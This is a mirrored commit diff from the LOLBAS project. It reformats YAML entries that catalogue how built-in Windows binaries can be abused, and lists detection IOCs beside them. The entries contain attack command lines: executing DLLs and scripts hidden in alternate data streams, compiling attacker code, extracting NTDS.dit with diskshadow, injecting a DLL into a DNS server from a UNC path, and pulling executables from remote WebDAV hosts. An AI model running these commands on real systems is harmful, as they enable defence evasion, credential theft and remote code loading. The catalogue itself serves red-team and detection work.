mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 14:55:19 +02:00 
			
		
		
		
	Changed all OSBinaries according to the new template
This commit is contained in:
		| @@ -13,8 +13,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\Atbroker.exe | ||||
|   - path: C:\Windows\SysWOW64\Atbroker.exe | ||||
|   - Path: C:\Windows\System32\Atbroker.exe | ||||
|   - Path: C:\Windows\SysWOW64\Atbroker.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -21,8 +21,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\bash.exe | ||||
|   - path: C:\Windows\SysWOW64\bash.exe | ||||
|   - Path: C:\Windows\System32\bash.exe | ||||
|   - Path: C:\Windows\SysWOW64\bash.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -1,5 +1,5 @@ | ||||
| --- | ||||
| Name: bitsadmin.exe | ||||
| Name: Bitsadmin.exe | ||||
| Description: Used for managing background intelligent transfer | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| @@ -37,8 +37,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\bitsadmin.exe | ||||
|   - path: C:\Windows\SysWOW64\bitsadmin.exe | ||||
|   - Path: C:\Windows\System32\bitsadmin.exe | ||||
|   - Path: C:\Windows\SysWOW64\bitsadmin.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -37,8 +37,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\certutil.exe | ||||
|   - path: C:\Windows\SysWOW64\certutil.exe | ||||
|   - Path: C:\Windows\System32\certutil.exe | ||||
|   - Path: C:\Windows\SysWOW64\certutil.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -13,8 +13,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1078 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\cmdkey.exe | ||||
|   - path: C:\Windows\SysWOW64\cmdkey.exe | ||||
|   - Path: C:\Windows\System32\cmdkey.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmdkey.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -21,8 +21,8 @@ Commands: | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1191 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - path: C:\Windows\System32\cmstp.exe | ||||
|   - path: C:\Windows\SysWOW64\cmstp.exe | ||||
|   - Path: C:\Windows\System32\cmstp.exe | ||||
|   - Path: C:\Windows\SysWOW64\cmstp.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|   | ||||
| @@ -1,21 +1,31 @@ | ||||
| --- | ||||
| Name: Control.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Binary used to launch controlpanel items in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: control.exe c:\windows\tasks\file.txt:evil.dll | ||||
|     Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1196 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1196 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\system32\control.exe    ' | ||||
|   - 'C:\Windows\sysWOW64\control.exe     ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\control.exe | ||||
|   - Path: C:\Windows\SysWOW64\control.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Control.exe executing files from alternate data streams. | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   - https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
|   - https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||||
|   - https://twitter.com/bohops/status/955659561008017409 | ||||
| Notes: Thanks to Jimmy - @bohops | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
|   - Link: https://twitter.com/bohops/status/955659561008017409 | ||||
|   - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items | ||||
|   - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
| @@ -1,21 +1,35 @@ | ||||
| --- | ||||
| Name: Csc.exe | ||||
| Description: Compile | ||||
| Author: '' | ||||
| Description: Binary file used by .NET to compile C# code  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: csc -out:My.exe File.cs | ||||
|   - Command: csc.exe -out:My.exe File.cs | ||||
|     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. | ||||
|     Usecase: Compile attacker code on system. Bypass defensive counter measures. | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: csc -target:library File.cs | ||||
|     Description: '' | ||||
|     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. | ||||
|     Usecase: Compile attacker code on system. Bypass defensive counter measures. | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Csc.exe should normally not run a system unless it is used for development.  | ||||
| Resources: | ||||
|   - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
|   - '' | ||||
| Notes: Thanks to ? | ||||
|  | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
| Acknowledgement: | ||||
|   - Person:  | ||||
|     Handle: | ||||
| --- | ||||
| @@ -1,19 +1,28 @@ | ||||
| --- | ||||
| Name: Cscript.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Binary used to execute scripts in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: cscript c:\ads\file.txt:script.vbs | ||||
|     Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\cscript.exe | ||||
|   - c:\windows\sysWOW64\cscript.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\cscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\cscript.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Cscript.exe executing files from alternate data streams | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,19 +1,29 @@ | ||||
| --- | ||||
| Name: Dfsvc.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: ClickOnce engine in Windows used by .NET | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Missing Example | ||||
|     Description: '' | ||||
|   - Command: Missing Example  | ||||
|     Description: Missing example | ||||
|     Usecase: Use binary to bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe     ' | ||||
|   - 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe    ' | ||||
|   - 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe    ' | ||||
|   - 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,20 +1,36 @@ | ||||
| --- | ||||
| Name: Diskshadow.exe | ||||
| Description: Execute, Dump NTDS.dit | ||||
| Author: '' | ||||
| Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: diskshadow.exe /s c:\test\diskshadow.txt | ||||
|     Description: Execute commands using diskshadow.exe from a prepared diskshadow script. | ||||
|     Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit | ||||
|     Category: Dump | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows server | ||||
|   - Command: diskshadow> exec calc.exe | ||||
|     Description: Execute a calc.exe using diskshadow.exe. | ||||
|     Description: Execute commands using diskshadow.exe to spawn child process | ||||
|     Usecase: Use diskshadow to bypass defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows server | ||||
| Full Path: | ||||
|   - c:\windows\system32\diskshadow.exe | ||||
|   - c:\windows\sysWOW64\diskshadow.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\diskshadow.exe | ||||
|   - Path: C:\Windows\SysWOW64\diskshadow.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Child process from diskshadow.exe | ||||
|  - IOC: Diskshadow reading input from file | ||||
| Resources: | ||||
|   - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
| Notes: Thanks to Jimmy - @bohops | ||||
|  | ||||
|   - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
| @@ -1,27 +0,0 @@ | ||||
| --- | ||||
| Name: Dnscmd.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
|     Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.' | ||||
| Full Path: | ||||
|   - c:\windows\system32\Dnscmd.exe | ||||
|   - c:\windows\sysWOW64\Dnscmd.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
|   - https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp | ||||
|   - https://twitter.com/Hexacorn/status/994000792628719618 | ||||
|   - http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html | ||||
| Notes: | | ||||
|     This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. | ||||
|     Thanks to Shay Ber - ?, | ||||
|     Dimitrios Slamaris - @dim0x69, | ||||
|     Nikhil SamratAshok, | ||||
|     Mittal - @nikhil_mitt | ||||
|  | ||||
							
								
								
									
										35
									
								
								yml/OSBinaries/Dnscmd.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										35
									
								
								yml/OSBinaries/Dnscmd.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,35 @@ | ||||
| --- | ||||
| Name: Dnscmd.exe | ||||
| Description: A command-line interface for managing DNS servers | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Commands: | ||||
|   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
|     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. | ||||
|     Usecase: Remotly inject dll to dns server | ||||
|     Category: Execute | ||||
|     Privileges: DNS admin | ||||
|     MitreID: T1035 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1035 | ||||
|     OperatingSystem: Windows server | ||||
| Full Path: | ||||
|   - Path: C:\Windows\System32\Dnscmd.exe | ||||
|   - Path: C:\Windows\SysWOW64\Dnscmd.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Dnscmd.exe loading dll from UNC path | ||||
| Resources: | ||||
|   - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
|   - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp | ||||
|   - Link: https://twitter.com/Hexacorn/status/994000792628719618 | ||||
|   - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html | ||||
| Acknowledgement: | ||||
|   - Person: Shay Ber | ||||
|     Handle: | ||||
|   - Person: Dimitrios Slamaris | ||||
|     Handle: '@dim0x69' | ||||
|   - Person: Nikhil SamratAshok | ||||
|     Handle: '@nikhil_mitt' | ||||
| --- | ||||
| @@ -1,28 +1,59 @@ | ||||
| --- | ||||
| Name: Esentutl.exe | ||||
| Description: Copy, Download, Write ADS, Read ADS | ||||
| Author: '' | ||||
| Description: Binary for working with Microsoft Joint Engine Technology (JET) database | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o | ||||
|     Description: Copies the source VBS file to the destination VBS file. | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: Copy  | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | ||||
|     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. | ||||
|   - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. | ||||
|   - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o | ||||
|     Description: Copies the source EXE to the destination EXE file. | ||||
|     Usecase: Extract hidden file within alternate data streams | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.   | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | ||||
|     Description: Copies the source EXE to the destination EXE file | ||||
|     Usecase: Use to copy files from one unc path to another | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\esentutl.exe | ||||
|   - c:\windows\sysWOW64\esentutl.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\esentutl.exe | ||||
|   - Path: C:\Windows\SysWOW64\esentutl.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://twitter.com/egre55/status/985994639202283520 | ||||
| Notes: Thanks to egre55 - @egre55 | ||||
|  | ||||
|   - Link: https://twitter.com/egre55/status/985994639202283520 | ||||
| Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
| --- | ||||
| @@ -1,23 +1,46 @@ | ||||
| --- | ||||
| Name: Expand.exe | ||||
| Description: Download, Copy, Add ADS | ||||
| Author: '' | ||||
| Description: Binary that expands one or more compressed files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat | ||||
|     Description: 'Copies source file to destination.' | ||||
|     Description: Copies source file to destination. | ||||
|     Usecase: Use to copies the source file to the destination file | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat | ||||
|     Description: 'Copies source file to destination.' | ||||
|     Description: Copies source file to destination. | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | ||||
|     Description: 'Copies source file to destination Alternate Data Stream (ADS).' | ||||
|     Description: Copies source file to destination Alternate Data Stream (ADS) | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\Expand.exe | ||||
|   - c:\windows\sysWOW64\Expand.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Expand.exe | ||||
|   - Path: C:\Windows\SysWOW64\Expand.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   - https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
| Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
| Acknowledgement: | ||||
|   - Person: Rahmat Nurfauzi | ||||
|     Handle: '@infosecn1nja' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,18 +1,27 @@ | ||||
| --- | ||||
| Name: Extexport.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Extexport.exe c:\test foo bar | ||||
|     Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll' | ||||
|     Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll | ||||
|     Usecase: Execute dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Program Files\Internet Explorer\Extexport.exe    ' | ||||
|   - C:\Program Files\Internet Explorer(x86)\Extexport.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Program Files\Internet Explorer\Extexport.exe | ||||
|   - Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Extexport.exe loads dll and is execute from other folder the original path | ||||
| Resources: | ||||
|   - http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ | ||||
| Notes: Thanks to Adam - @hexacorn | ||||
|  | ||||
|   - Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
| --- | ||||
| @@ -1,24 +1,47 @@ | ||||
| --- | ||||
| Name: Extrac32.exe | ||||
| Description: Add ADS, Download | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | ||||
|     Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' | ||||
|     Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream.  | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe | ||||
|     Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.' | ||||
|     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream.  | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt | ||||
|     Description: 'Copy the source file to the destination file and overwrite it.' | ||||
|     Description: Copy the source file to the destination file and overwrite it. | ||||
|     Usecase: Download file from UNC/WEBDav | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\extrac32.exe | ||||
|   - c:\windows\sysWOW64\extrac32.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\extrac32.exe | ||||
|   - Path: C:\Windows\SysWOW64\extrac32.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - https://twitter.com/egre55/status/985994639202283520 | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55 | ||||
|  | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://twitter.com/egre55/status/985994639202283520 | ||||
| Acknowledgement: | ||||
|   - Person: egre55 | ||||
|     Handle: '@egre55' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,23 +1,52 @@ | ||||
| --- | ||||
| Name: Findstr.exe | ||||
| Description: Add ADS, Search | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe | ||||
|     Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' | ||||
